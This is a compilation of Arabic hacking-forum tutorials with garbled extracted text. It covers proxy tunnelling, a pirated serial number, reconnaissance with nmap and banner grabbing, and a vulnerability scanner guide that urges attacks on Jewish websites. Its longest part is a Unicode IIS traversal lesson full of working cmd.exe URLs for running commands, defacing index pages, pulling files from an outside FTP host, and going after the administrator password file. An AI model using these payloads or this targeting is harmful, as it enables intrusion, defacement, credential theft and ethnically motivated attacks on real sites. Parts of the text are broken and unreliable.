         ‫‪http://www.angelfire.com/tv2/ssdd63/httport3snf.zip‬‬
                                            ‫------------------------‬


                                                                       ‫الشر ح:‬
                                                     ‫-------------------------‬

                                                  ‫الشر ح قام بشرحه أخي العزيز‬
                                                                  ‫‪FAHAD‬‬
                                      ‫هللا يخليه ماخلى شي من خبراته إال وطرحه‬


                                                           ‫نــقـــــول بســــم هللا‬



                                                                    ‫الشكل األول‬




                             ‫021‬
‫واجهة البرنامج الرئيسية أضغط على األختيار الثالث فوق‬
                                 ‫‪Port mapping‬‬


                                        ‫الشكل الثاني‬




                           ‫أضغط على األختيار‪Add‬‬
          ‫سوف تضاف قائمة مثل التي في الشكل أسمها‬
                                 ‫‪New mapping‬‬
                               ‫لين الحين كل شي تمام‬


                                        ‫الشكل الثالث‬


‫121‬
‫هنا ياطويل العمر تكتب نفس الكالم واألرقام المكتوبة زي كذا‬
                                     ‫08 : ‪Local port‬‬
            ‫‪Remote host : webcache.bt.net‬‬
                                ‫8213 : ‪Remote port‬‬

                                           ‫‪OKY MAN‬‬


                                             ‫الشكل الرابع‬




                    ‫األن عد لألختيار الثاني فوق‪Proxy‬‬
       ‫واكتب مكان الرقم واحد البروكسي األصلي ألشتراكك‬
                                     ‫سمعت ,,, األصلي‬


   ‫221‬
                              ‫ومكان الرقم أثنين المنفذ‬
                     ‫وفي األخير ضغطه قوية على الزر‬
                                                ‫‪Start‬‬
                          ‫ماخلصنا بقى الخطوة األخيرة‬


                                       ‫الشكل الخامس‬




                                ‫من خيارات األنترنت‬
                          ‫ضع البروكسي 2.2.2.162‬
                                         ‫والمنفذ 20‬


                      ‫والحين رو ح للمتصفح وأدهر بكيفك‬
     ‫وكيف نفسك بنفسك وما عليك رقيب إال هللا عزوجل..‬

‫انتهى،،،‬




 ‫321‬
                        ‫برنامج ‪" NeoTrace‬‬                  ‫" شرح‬

                                                                                     ‫<منقول>‬

                                                                ‫<الكاتب: ‪> DarK_HaCKeR‬‬

                                                          ‫برنامج يكشف كل شي عن صاحب االيبي‬
                                                                              ‫مرحبا شباب ..‬

‫هاذا برنامج ممتاز للكشف عن معلومات الشخص و بلده و كل شيء بس بمجرد معرفة االيبي ماله .. او تريد‬
                                                                ‫تعرف معلومات عن موقع معين ..‬

                                                           ‫اسم البرنامج ..‬
                                                  ‫‪Neo Trace Express‬‬
                                                        ‫اتفضلوا الوصلة ..‬
                        ‫‪http://www.neoworx.com/download/NTX325.exe‬‬




                                                                                             ‫!‪Error‬‬




                                            ‫421‬
      Error!




      Error!




125
           ‫اتمنى ان الشر ح وافي وهذا هو السيريل نمبر :‬
                    ‫‪XDQG-2ZKN-X2PA-KTRQ‬‬



‫انتهى،،،‬




 ‫621‬
‫" كيفية القيام بجمع المعلومات عن موقع أو شبكة "‬

                                                                        ‫<منقول من منتدى إعصار>‬

                                                                                  ‫<الكاتب: المدمر>‬

                                        ‫طرق جمع المعلومات ألي موقع أو سيرفر أو شبكة أيا كانت :‬

                                                                            ‫=(الطريقة األولى)=‬
                                                                ‫^^^^^^^^^^^^^^^^^^^‬
                                                                      ‫وهي من خالل زيارة موقع‬
                                                              ‫/‪http://www.netcraft.com‬‬
                                            ‫وتكتب الموقع هناك ورا ح يعرض لك معلومات تفيدك كثير‬
                                                                ‫^^^^^^^^^^^^^^^^^^^‬

                                                                        ‫=(الطريقة الثانية)=‬
                                                           ‫^^^^^^^^^^^^^^^^^^^‬
   ‫وهي قديمة تستخدم حديثا لكني الادري مدى عملها ولنفرض الموقع الي نبي نجيب معلومات عنه هو‬
                                                  ‫/‪http://www.almodammer.com‬‬
                                            ‫نقوم بإرسال رسالة إليميل وهمي وغير موجود مثل‬
                                      ‫‪dfl;kjgk'dgjbumpipt@almodammer.com‬‬
‫وبعد ارسال رسالة إليميل وهمي را ح تستقبل رد ولما تعرض الـ ‪Headers‬الخاص بالرسالة را ح تالقي‬
                                                                        ‫معلومات عن الموقع‬
                                                           ‫^^^^^^^^^^^^^^^^^^^‬

                                                                                ‫=(الطريقة الثالثة)=‬
                                                                   ‫^^^^^^^^^^^^^^^^^^^‬
                                                                                     ‫الـ‪Banners‬‬
                                                                                        ‫ماهو البانر؟‬
                          ‫البانر وباختصار شديد هي الرسائل التي تأتيك عندما تنفذ أمر ما يعني الرد..‬
                                                       ‫وكيف را ح نستغلها في كشف معلومات الموقع؟‬
 ‫عن طريقة أداة ‪ Telnet Client‬عميل التلنت والطريقة هي أن تقوم باالتصال بأحد المنافذ سواء كان‬
                                                                                          ‫12 ‪FTP‬‬
                                                                                                  ‫أو‬
                                                                                   ‫32 ‪TELNET‬‬
                                                                   ‫^^^^^^^^^^^^^^^^^^^‬

                                                                           ‫=(الطريقة الرابعة)=‬
                                                              ‫^^^^^^^^^^^^^^^^^^^‬
                                                                                   ‫وهي‪HTTP‬‬
                                                        ‫‪Hyper Text Transfer Protocol‬‬
                                                                 ‫ويعمل على المنفذ 20 - 2020‬
                           ‫ألحين نتصل على المنفذ 20 عن طريق ‪ Telnet‬وبعدين نكتب األمر التالي‬
                                                                   ‫1.1/‪GET /qwe HTTP‬‬
                                                ‫بعد كذا را ح يخبرنا البانر بوجود صفحات الخطأ 22.‬
                                                            ‫ورا ح تجيك معلومات هائلة عن الهدف‬
                                                                     ‫وفيه عندك امر ثاني وهو:‬
                                                             ‫1.1/‪HEAD 127.0.0.1 HTTP‬‬
                                                                                 ‫تقوم بتنفيذه...‬
                                                              ‫^^^^^^^^^^^^^^^^^^^‬


                                             ‫721‬
                                                                                ‫=(الطريقة الخامسة)=‬
                                                                     ‫^^^^^^^^^^^^^^^^^^^‬
  ‫وهي من أمر ‪ ping‬الذي يقوم بإرسال عدة طلبات للـ ‪ip‬أو للموقع ويقوم باستقبال الردود وبسرعة هائلة‬
                                                  ‫الحين كيف نستفيد منها في تحديد معلومات للموقع !‬
                                                                                ‫حيث تقوم بوضع التالي‬
                                                                                        ‫‪ping ipsite‬‬
                                                                    ‫=‪ipsite‬اآلي بي الخاص بالموقع‬
                                                          ‫ورا ح يطلعلك عدة اسطر حنا مايهمنا اال كلمة‬
                                                                                         ‫‪TTL=XXX‬‬
                                                                       ‫=‪XXX‬القيمة والعدد الي طلعلك‬
                              ‫بتقولي وش فايدته أقولك من خالله يمكن تحديد نظام التشغيل وهذي امثلة:‬
                                                                    ‫23 ‪Windows 9x/NT Intel‬‬
                                                                  ‫821 ‪Windows 9x/NT Intel‬‬
                                                                   ‫821 ‪Windows 2000 Intel‬‬
                                                                   ‫06 ‪DigitalUnix 4.0 Alpha‬‬
                                                                     ‫46 ‪Unisys x Mainframe‬‬
                                                                          ‫46 ‪Linux 2.2.x Intel‬‬
                                                             ‫46 ‪FTX(UNIX) 3.3 STRATUS‬‬
                                                                         ‫46 ‪SCO R5 Compaq‬‬
                                                                      ‫821 ‪Netware 4.11 Intel‬‬
                                                                  ‫06 0006‪AIX 4.3.x IBM/RS‬‬
                                                                  ‫06 0006‪AIX 4.2.x IBM/RS‬‬
                                                                           ‫06 7057 2.11 ‪Cisco‬‬
                                                                         ‫552 4152 0.21 ‪Cisco‬‬
                                                                                ‫06 ‪IRIX 6.x SGI‬‬
                                                                        ‫46 ‪FreeBSD 3.x Intel‬‬
                                                                       ‫46 ‪OpenBSD 2.x Intel‬‬
                                                                      ‫46 ‪Solaris 8 Intel/Spar‬‬
                                                                ‫552 ‪Solaris 2.x Intel/Sparc‬‬
                                             ‫وقد يحدث اختالف في القيم حيث يكون الفرق يساوي واحد‬
    ‫أي: عند مرور( ‪ data list or packet‬حزم او قائمة بيانات) بـ ‪Nodes‬حيث أن ‪ TTL‬تنقص بـ2‬
              ‫لذلك عليك ان تستعمل أمر ‪ tracert‬في الويندوز أما ‪ traceroute‬فهو خاص باليونكس‬
                                               ‫وهو امر خاص بعرض معلومات عن الشخص أو الموقع‬
                                                                        ‫ويمكننا استخدامه بهذه الطريقة‬
                                                                                         ‫‪tracert ip‬‬
                                                                        ‫=‪ip‬عنوان الموقع أو السخص‬
                                                                     ‫^^^^^^^^^^^^^^^^^^^‬

                                                                               ‫=(الطريقة السادسة)=‬
                                                                      ‫^^^^^^^^^^^^^^^^^^^‬
                                                                          ‫عن طريقة األدوات والبرامج‬
                                                                        ‫أوال ‪ Windows‬ألنه األسهل‬
 ‫يمكنك تحديد معلومات عن الموقع والسيرفر او المنافذ المفتوحة من قبل تطبيق اي برنامج ويمكنك استغالل‬
                                   ‫المنافذ بكثير من عمليات االختراق وسوف نطرق لها في الدرس الثاني‬
‫تعرفون ان الويندوز مليان برامج لكن تعرفون ان مو كل برنامج مثل أي برنامج عشان كذا را ح اذكر االفضل‬
                                                                                                  ‫:‬
                                    ‫‪(N-Stealth‬لتحديد معلومات عن الشبكة منها المنفذ ثغرات ...الخ)‬
                                                                              ‫=============‬
   ‫) ‪Shadow Sceurity Scanner‬من أفضل برامج البحث عن المنافذ والتطبيقات والعمليات ومعظم‬


                                               ‫821‬
                                                                )‫الثغرات مع وجود شر ح لكيفية عالجها‬
                                                                               =============
‫برنامجي المفضل فأنا استخدمه الختراق المواقع واألجهزة حيث يساعدني كثيرا في معرفة‬SuperScan )
             )‫ كبيرة يمنك اإلضافة عليها كيفما شئت‬List ‫المنافذ المفتو ح بالموقع واألجهزة ويحتوي على‬
                            -------------------------------------------------------------------------
                                                                              Linux‫الحين نجي على‬
                     ‫هو برنامج واحد مفضل وأكثر مستخدمين ليونكس يشهدون بجدارته والذي يحمل اسم‬
                                                                                             Nmap
                                                  )‫مستكشف الشبكات‬Network Maper (‫اختصار لـ‬
      ‫وهو خاص للمتهمين‬Linux ‫وطبعا يفوق كل ادوات ويندوز وطرق ويندوز علشان كذا دائما ينصح بـ‬
                                                                   ‫باختراق الشبكات/المواقع/السيرفرات‬
                                                                                     : ‫كيفية استمعاله‬
                                            /‫ ورا ح تجد الكثير من األوامر الذي ظهرت مثل‬nmap ‫شغل‬
                       [l] Nmap V. 3.00 Usage: nmap [Scan Type(s)] [Options]
             Some Common Scan Types ('*' options require root privileges)
                  * -sS TCP SYN stealth port scan (default if privileged (root))
                 -sT TCP connect() port scan (default for unprivileged users)
                                                                         * -sU UDP port scan
                                      -sP ping scan (Find any reachable machines)
                   * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
                              -sR/-I RPC/Identd scan (use with other scan types)
     Some Common Options (none are required, most can be combined):
          * -O Use TCP/IP fingerprinting to guess remote operating system
                    -p ports to scan. Example range: '1-1024,1080,6666,31337'
                                        -F Only scans ports listed in nmap-services
          -v Verbose. Its use is recommended. Use twice for greater effect.
     -P0 Don't ping hosts (needed to scan http://www.microsoft.com/ and
                                                                                           others)
                   * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
                                                                   -T General timing policy
       -n/-R Never do DNS resolution/Always resolve [default: sometimes
                                                                                          resolve]
                        -oN/-oX/-oG Output normal/XML/grepable scan logs to
                                             -iL Get targets from file; Use '-' for stdin
                            * -S /-e Specify source address or network interface
                --interactive Go into interactive mode (then press h for help)
     Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16 '192.88-
                                                                                             90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND
                                                                                     EXAMPLES
                                                   !!!!!!!!! ‫وأيضا يحتوي العديد من االوامر المجهولة‬
                               ..‫ الخاص بالبرنامج‬man page ‫ولخلفية ومعلومات اكثر قم بالذهاب إلى‬
                                                                                  ‫لنشر ح أهم أمر وهو‬
                                                    nmap -sS -O -vv almodammer.com
                                                      ‫الموقع المراد فحصه‬almodammer.com=
                                   ‫ورا ح يعرض لك معلومات هائلة تفوق معلومات برامج وأدوات ويندوز‬
                                                         .......‫منها المنافذ واإلصدار والملقم والسيرفر‬
                                                                    ^^^^^^^^^^^^^^^^^^^

                                                                                 =)‫)=الطريقة السابعة‬


                                                129
                                                                      ‫^^^^^^^^^^^^^^^^^^^‬
‫تعتمد على وجود جهازك ‪ Linux‬أو ‪ Shell Account‬حتى تقدر تطبق اوامر اليونكس في الويندوز لكن‬
      ‫لو تركب ‪ Linux‬أفضل ألن ‪ Shell‬الزم يكون ممتاز وسعره مناسب علشان كذا التتعب نفسك وركب‬
                                                                                        ‫‪Linux‬وارتا ح‬
                                                                                 ‫المهم هذا أمر ‪whois‬‬
                                      ‫والي يوفره لنا ‪ Linux‬والويندوز كبرامج كبيرة وثقيلة وغير دقيقة‬
                                                                            ‫ولمعلومات أكثر اضف األمر‬
                                                                                       ‫‪man whois‬‬
                                    ‫-------------------------------------------------------------------‬
                                                      ‫أما عن طريق الويندوز فيمكنك البحث في‪google‬‬
             ‫‪http://www.google.com/search?q=whois&btnG=Google+Search‬‬
   ‫والكثير من المواقع تقدم هذي الخدمة وهي سكربتات و ‪ cgi‬تقوم بالبحث عن الموقع بإحدى الطرق التي‬
                     ‫ذكرتها مع اختالف بسيط وهي شبيهة بموقع ‪ netcraft‬الطريقة األولى..............‬

                                               ‫انتهى،،،‬




                                                ‫031‬
        ‫" برنامج عمران سكان للبحث عن الثغرات "‬

                                                                  ‫<منقول من عالم الكومبيوتر>‬

                                                           ‫@ ‪<ZREKC@HL‬‬               ‫<الكاتب:‬



‫برنامج عمران سكان يعتبر من أفضل برامج كشف الثغرات و ذلك لما يتميز به من سرعه سهولة في تغيير‬
                                                                              ‫ملف الثغرات.‬




                                                      ‫2 اسم الموقع المراد البحث عن ثغرات فيه‬
                                                                            ‫و ال تنسى ‪//:ptth‬‬
                                                                                     ‫مالحظه :‬
                                                                  ‫ال تضع \ في نهايه الموقع مثل‬
                                                                 ‫‪/moc.XXX.www//:ptth‬‬
                                                        ‫ألنه سيضع من عنده / عند تطبيق الثغره‬

                                                                           ‫6 اسم ملف الثغرات‬

                                                            ‫3 لتغيير ملف الثغرات إلى ملف آخر‬

                                                                 ‫. الثغرات الموجوده في الملف‬




                                          ‫131‬
                                                                                                                                                                                                                 ‫5 لبدء الفحص‬

                                                                                                                                                                                                                            ‫2 لاليقاف‬

                                                                                                                   ‫1 شاشة العمليات الجاريه من فحص الثغرات على الموقع‬

                                                                                                                              ‫0 الثغرات الموجوده على الموقع التي نجح اختبارها‬

                                                                      ‫8 لمسح شاشه العمليات و النتائج إلعاده البحث مره اخرى على ثغرات اخرى‬

                                                                                                                                                                                                                                    ‫22 ال‬

                                                                                                                                                                                                                         ‫22 منفذ ال‬

                                                                                                                                                                          ‫مالحظ : 22 22‬
                                                                                                                                                     ‫اذا ما عرفت ال فيجب عليك مسح البيانات‬

                                                                                                                                                                                                                        ‫62 للخروج‬




‫مالحظهههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه هامهههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههههه :‬
     ‫ال تنسو المواقع اليهودية التي تنتظر من يخترقها فأرجو عدم استخدامه ضد الموقع العربية او االسالمية.‬




                                                                                                                ‫انتهى،،،‬




                                                                                                                    ‫231‬
‫" اإلختراق عن طريق اليونيكود (الجزء األول) "‬

                                                                                   ‫<منقول>‬

                                                                  ‫<الكاتب:‪> sNiper_hEx‬‬

                              ‫يحتوى الدرس االول على ( 13 نقطة ) وهي كما يلي :-‬
                                                                 ‫- تعريف باليونيكود .‬
                                                            ‫- تاريخ ظهور هذه الثغرة .‬
                                                           ‫- كيفية ايجاد هذه الثغرات .‬
                                                   ‫- كيف يتم استغالل ثغرات اليونكود .‬
                                            ‫.‬   ‫‪CMD‬‬   ‫- االوامر المستخدمة بواسطة ملف‬
                                                          ‫- طريقة تطبيق هذه الثغرات .‬
              ‫.‬   ‫‪ECHO‬‬   ‫- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ‬
                   ‫التاحة امكانية الكتابة على الملفات .‬   ‫‪CMD‬‬   ‫- طريقة نسخ ملف الـ‬
                    ‫والحلول المتبعة لها .‬   ‫‪Access Denied‬‬    ‫- كيفية معرفة مشكلة الـ‬
                                     ‫.‬   ‫‪FTP‬‬    ‫- كيفية عمل اكاونت للدخول بواسطة الـ‬
                                                ‫- طريقة كشف باسورد االدمينستريتور .‬
       ‫.‬   ‫‪TFTP‬‬   ‫- تغيير الصفحة الرئيسية للموقع وعملية االب لوود بواسطة برنامج‬
                                     ‫- مسح ملفات اللوق حتى ال يتم التعرف عليك .‬




                                    ‫331‬
                                                                                ‫- تعريف باليونيكود .‬
‫0.5‪IIS4.0 / IIS‬‬   ‫اليونيكود عبارة عن مجموعة من الثغهرات فهي مجموعهة خدمهة المعلومهات التهي ركبهت مهع‬
                                                                     ‫والذي ياتي عادة مع ‪. NT4 / Win2k‬‬



                                                                          ‫- تاريخ ظهور هذه الثغرة .‬
‫اليوجههد تههاريخ محههدد لظهههور اول ثغههرة لليونيكههود لههذا يعتبههر ظهورههها بواسههطة شههخص مجهههول ‪anonymous‬‬
‫‪ ، person‬وقيل ان اول ظهور لثغرات اليونيكود كانت بواسطة الصينين ولكن اليوجد مايثبهت صهحة ههذا الكهالم‬
                   ‫لهذه الثغرات ، فتم استغالل هذه الثغرات من قبل المخترقين وتطوير البرامج الالزمة لها .‬



                                                                         ‫- كيفية ايجاد هذه الثغرات .‬
                                                                 ‫يتم ايجاد هذه الثغرات بطريقتين :-‬
‫2 - بواسطة البرامج الالزمة والمخصصة لكشف هذه الثغرات سواء بهالبرامج التهي تعمهل علهى‬
                              ‫نظام ويندوز او بطريقة الشل والتي تعمل على نظام لينكس .‬
                                            ‫6 - بواسطة تطبيق الثغرة على الموقع مباشرة .‬



                                                                ‫- كيف يتم استغالل ثغرات اليونكود .‬
‫عند تطبيق الثغرة على نظام الـ 5‪ IIS4 / IIS‬يبهدا ملهف ‪ CMD‬بفهك شهفرة اليونكهود فهي المثهال الخطهاء‬
                                                                           ‫ومن هنا يتم استغاللها .‬



                                                           ‫- االوامر المستخدمة بواسطة ملف ‪. CMD‬‬
‫االوامر المستخدمه بواسطة ملف الـ ‪ CMD‬وهي امر النشاء دليل جديد وامر اللغاء دليل وامر النسخ وامر‬
‫النقل وامر الحذف وامر تغيير اسماء الملفات وامهر لرؤيهة محتويهات الملهف وامهر الكتابهة داخهل أي ملهف‬
                                                   ‫وامر لسحب أي ملف ، وهي حسب االمثلة التالية :-‬
‫:امر انشاء دليل جديد‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+md+c:\hEx‬‬


‫:امر الغاء دليل‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+rd+c:\hEx‬‬
‫للمعلومية:اليمكن الغاء أي دليل اال اذا كان فارغاً تمام من الملفات والمجلدات‬

‫:االمر المستخدم للنسخ‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\sy‬‬
‫‪stem32\cmd.exe+c:\inetpub\scripts\hEx.exe‬‬


‫:االمر المستخدم للنقل‬
‫‪http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+move+c:\winnt\system32\cm‬‬
‫\:‪d.exe+c:\inetpub\scripts\hEx.exe+c‬‬


‫:االمر المستخدم للحذف‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+del+c:\hEx.mdb‬‬




                                                     ‫431‬
‫:االمر المستخدم لتغيير مسمى الملفات‬
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+ren+c:\index.htm+hEx.htm


‫:االمر المستخدم لرؤية محتويات الملف‬
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+type+c:\hEx.txt


‫:االمر المستخدم للكتابة داخل أي ملف‬
http://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/c+echo+sNiper_hEx+>c:\hEx.t
xt


‫:االمر المستخدم لعملية سحب أي ملف‬
‫:عليك القيام اوالً بنسخ الملف المراد سحبه الى أي دليل وبعدها يتم كتابة اسم الملف في اخر العنوان كالتالي‬
http://www.xxxx.com/msadc/hEx.mdb




                                                                     . ‫- طريقة تطبيق هذه الثغرات‬
                               -: ‫تطبيق الثغرة على الموقع من خالل المتصفح تتم حسب االمثلة التالية‬
http://www.xxxx.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir +c:\
                                                         -: ‫وقد نحتاج الى تغيير مسمى الدليل بحيث يكون‬
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin




                            . ECHO ‫- كيفية اختصار ثغرة اليونيكود حتى تتمكن من تفعيل امر الـ‬
               -: ‫في حالة اكتشاف موقع يعاني من مشكلة اليونيكود ولنفترض انه كان على هذه الثغرة‬
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


         -: ‫واالمر يكون بهذه الطريقة‬   inetpub\scripts   ‫الى مجلد‬   w3svc.exe    ‫فنحتاج الى نسخ ملف‬
http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt
\system32\cmd.exe+c:\inetpub\scripts\w3svc.exe



‫، االن نقوم بتصفح الموقع من خـالل الثغـرة‬     inetpub\scripts   ‫الى مجلد‬   w3svc.exe   ‫بعد نسخ ملف‬
                                                                                     -: ‫بهذه الطريقة‬
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\
  ‫االن نستطيع الكتابة داخل أي ملف وبالتحديد الملف الرئيسي للموقع الذي غالبا مايكون في هذا الدليل‬
                               -: ‫بحيث يكون االمر بالشكل التالي‬     inetpub\wwwroot\index.htm
http://www.xxxx.com/scripts/w3svc.exe?/c+echo+Hacked+By+sNiper_hEx+hExRay@Hotmail.co
m+>+c:\inetpub\wwwroot\index.htm




                                 . ‫التاحة امكانية الكتابة على الملفات‬   CMD‫الـ‬   ‫- طريقة نسخ ملف‬



                                                  135
 ‫الغرض من نسخ ملف الـ‪ CMD‬وهو العطاء امكانية للكتابة داخل السيرفر في بعض الحااالت وياتم نساخ‬
                                                                 ‫الى مجلد السيكربت بهذه الطريقة :-‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt‬‬
‫‪\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe‬‬
                          ‫االن بامكاننا استخدام ملف الـ‪ CMD‬الجديد في الثغرة بدال من االول بهذا الشكل :-‬
‫\:‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd1.exe?c+dir+c‬‬




                                         ‫والحلول المتبعة لها .‬    ‫‪Access Denied‬‬        ‫- كيفية معرفة مشكلة الـ‬
‫تتم معرفة مشكلة الـ ‪ Access Denied‬مان خاالل المحاولاة فاي حاذف أي ملاف مان أي امتاداد ، فعناد‬
‫ظهور رسالة الاـ ‪ Access Denied‬فالياك هاذه الطارت حتاى تاتمكن مان الكتاباة علاى الملحاات والاتحكم‬
                                                                                ‫اكثر على السيرفر :-‬
‫1 - الطريقة االولى نسخ ملف الاـ ‪ CMD‬الاى دليال السايكربت بمسامى 1‪ CMD‬فساوف يتاال لاك امكانياة‬
                                                ‫الكتابة باستخدام االمر ‪ Copy‬باستخدام هذا االمر :-‬
‫‪http://www.xxxx.com/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?c+copy+c:\winnt‬‬
‫‪\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe‬‬
                                         ‫- الطريقة الثانية بالتعامل مع الملف ‪ ssinc.dll‬والطريقة كما يلي :-‬           ‫6‬
                                                               ‫اوال انشاء صفحة باسم ‪test.shtml‬‬            ‫‪o‬‬
                                         ‫تكون هذه الصفحة داخل مجلد ‪wwwroot/hEx/test.shtml‬‬                 ‫‪o‬‬
‫‪ o‬كتابة هذا الكود داخل الصفحة <!--#‪ >--"include file="AAAA[...]AA‬بحيث ان حرف ‪ A‬يتم‬
                                                               ‫كتابتة حتى يتعدى 8.26 حرف .‬
                      ‫االن يتم طلب الصفحة من خالل المتصفح ‪http://www.xxxx.com/test.shtml‬‬                  ‫‪o‬‬
                                                                   ‫‪ o‬االن سوف تظهر لك الصفحة .‬
                                      ‫‪ o‬االن تستطيع الكتابه وتم تخطي مشكلة الـ‪. Access Denied‬‬
           ‫‪ o‬اذا ظهرت لك صفحة الخطاء رقم 225 فمعناها انك لم تقم بتطبيق الطريقة بالشكل‬
                                                                ‫الصحيح وعليك اعادة المحاولة .‬
‫- الطريقة الثالثة باستخدام برنامج ‪ NC.exe‬بحيث يتم عمل اب لوود لهذا الملف داخل مجلد الـ‪ Temp‬في‬                        ‫3‬
‫دليههل الوينههدوز ومنههه يههتم تنفيههذ االوامههر مههن خههالل موجههة الههدوز وللمعلوميههة مجلههد الههـ‪ Temp‬مفتههو ح‬
                                                                                           ‫لعمليات االب لوود .‬
‫- الطريقة الرابعة وهي من خالل عمل كهراش للسهيرفر باسهتخدام البهرامج الالزمهة لههذا الغهرض وههذه‬                      ‫.‬
                                                                 ‫الطريقة غير مجديه في كثير من االحيان .‬
‫- البحهههههث عهههههن ملفهههههات : ‪ w3svc.exe ، shell.exe ، sensepost.exe ، root.exe‬ونسهههههخها الهههههى مجلهههههد‬    ‫5‬
                                                            ‫‪ c:\inetpub\scripts‬وتطبيق الثغرة من خاللها .‬



                                                           ‫- كيفية عمل اكاونت للدخول بواسطة الـ ‪. FTP‬‬
         ‫1 - نسخ ملف ‪ CMD‬الى مجلد ‪ Scripts‬باسم ‪ Shell.exe‬حتى يتم االستحادة من ثغرة قديمة‬
‫‪/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe‬‬
  ‫2 - انشاء ملف ‪ mspft.pll‬بواسطة االمر ‪ Echo‬وكتابة في التالي ‪ open ftp.host.com‬حيا‬
                                                         ‫ان هذا هو الخادم للـ‪. FTP‬‬
‫‪/c+echo+open+ftp.host.com+>+c:\winnt\mspft.ppl‬‬
   ‫3 - االن مطلوب اضافة مجهول ‪ Anonymous‬الى نفس الملف الذي قمنا بانشاءه ‪mspft.pll‬‬
‫‪/shell.exe?/c+echo+anonymous+>>+c:\winnt\mspft.ppl‬‬
             ‫الى نفس الملف الذي قمنا بانشاءه‬         ‫‪hExRay@Hotmail.Com‬‬            ‫4 -االن مطلوب ادراج البريد‬
                                                                                              ‫‪mspft.pll‬‬
‫‪/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl‬‬
                         ‫‪ Anonymous‬لزوم الملف الذي قمنا بانشاءه ‪mspft.pll‬‬                     ‫5 - إضافة ‪ User‬قبل‬
‫‪/shell.exe?/c+echo+user+anonymous+>>+c:\winnt\mspft.ppl‬‬
                                                                                  ‫2 - االن تكرار لحاجة االعداد‬
‫‪/shell.exe?/c+echo+hEx@Hotmail.Com+>>+c:\winnt\mspft.ppl‬‬




                                                          ‫631‬
                                                                      ‫1 - يتم هنا ادراج الموقع الحالي للملفات‬
‫‪/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+>>+c:\winnt\mspft.ppl‬‬
‫0 - االن يكتب اوامهر الهـ‪ FTP‬الالزمهة لسهحب الملهف مهن خهادم الهـ‪ FTP‬وههي ‪ Get index.htm‬ثهم يهدرج هنها‬
                                                                             ‫بدون المسج السابق‬
‫‪/shell.exe?/c+echo+get+index.html+>>+c:\winnt\mspft.ppl‬‬
                                                                     ‫9 هنا نفس السابق ولكن باضافة ‪Quit‬‬
                                                                                                   ‫-‬
‫‪/shell.exe?/c+echo+quit+>>+c:\winnt\mspft.ppl‬‬
‫وههههو عبهههارة عهههن خطهههوات قمنههها بانشهههاءها‬   ‫”‪FTP.exe?+"-s:c:winnt\mspft.ppl‬‬‫22 - االن يهههتم تنفيهههذ امهههر‬
                                                     ‫وموجودة في ملف ‪ mspft.ppl‬باحتوائها على مايلي :-‬
‫-‬   ‫‪Open FTP.host.com‬‬
‫-‬   ‫‪Anonymous‬‬
‫-‬   ‫‪hEx@Hotmail.Com‬‬
‫-‬   ‫‪User Anonymous‬‬
‫-‬   ‫‪hEx@Hotmail.Com‬‬
‫-‬   ‫‪Get index.html‬‬
‫-‬   ‫‪Quit‬‬


‫"‪/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl‬‬


                                                                   ‫- طريقة كشف باسورد االدمينستريتور .‬
    ‫نحتاج الى وجود برنامجين ( ‪ ) Microsoft Access – L0phtCrack‬وهي لزوم تنفيذ بعض‬
                                                                       ‫الخطوات لتالية وهي :-‬
    ‫- باسورد االدمينستيتور للسيرفر يكون موجود في ملف الـ _.‪ SAM‬في دليل \‪ \winnt\repair‬وافضل‬
              ‫برنامج لفك شفرة الباسورد هو برنامج ‪ L0phtCrack‬كما هو موضح بالشكل التالي:-‬




‫- اذا كهان هنهاك مسهتخدمين فهي السهيرفر ويوجهد لهديهم حسهاب فهان معلومهاتهم سهوف تكهون فهي ملههف‬
      ‫‪ PASSFILT.DLL‬ونستطيع تحديد مسار هذا الملف من خالل الريجستري بواسطة هذا المفتا ح :-‬
